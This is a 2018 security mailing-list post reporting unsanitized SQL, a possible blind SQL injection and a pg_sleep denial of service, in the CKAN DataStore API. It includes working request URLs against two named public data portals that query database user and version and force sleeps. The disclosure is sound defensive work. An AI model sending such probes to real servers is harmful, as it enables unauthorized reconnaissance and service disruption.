[CKAN-Security] Blind SQL Injection & DOS vulnerability with CKAN DataStore
Philip Ashlock - QXA
philip.ashlock at gsa.gov
Thu Jun 7 00:01:42 UTC 2018
It looks like there are some SQL commands that go unsanitized when using
the CKAN DataStore API. In some scenarios this would lead to a blind sql
injection that could disclose sensitive information in the database, but
I'm not familiar enough with DataStore to test for that. At the very least
the fact that the "sleep()" command is not sanitized does create a denial
of service vulnerability.
Select current_user and version()
https://inventory.data.gov/api/action/datastore_search_sql?sql=SELECT%20current_user,version()
;
https://data.boston.gov/api/action/datastore_search_sql?sql=SELECT%20current_user,version()
;
Sleep for 5 seconds
https://inventory.data.gov/api/action/datastore_search_sql?sql=SELECT%20pg_sleep(5)
;
https://data.boston.gov/api/action/datastore_search_sql?sql=SELECT%20pg_sleep(5)
;
I noticed that I couldn't recreate this behavior on https://demo.ckan.org
so perhaps this has been addressed with newer versions of CKAN or the
relevant extensions?
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://lists.okfn.org/mailman/private/security/attachments/20180606/6d9b4bad/attachment.html>
More information about the Security
mailing list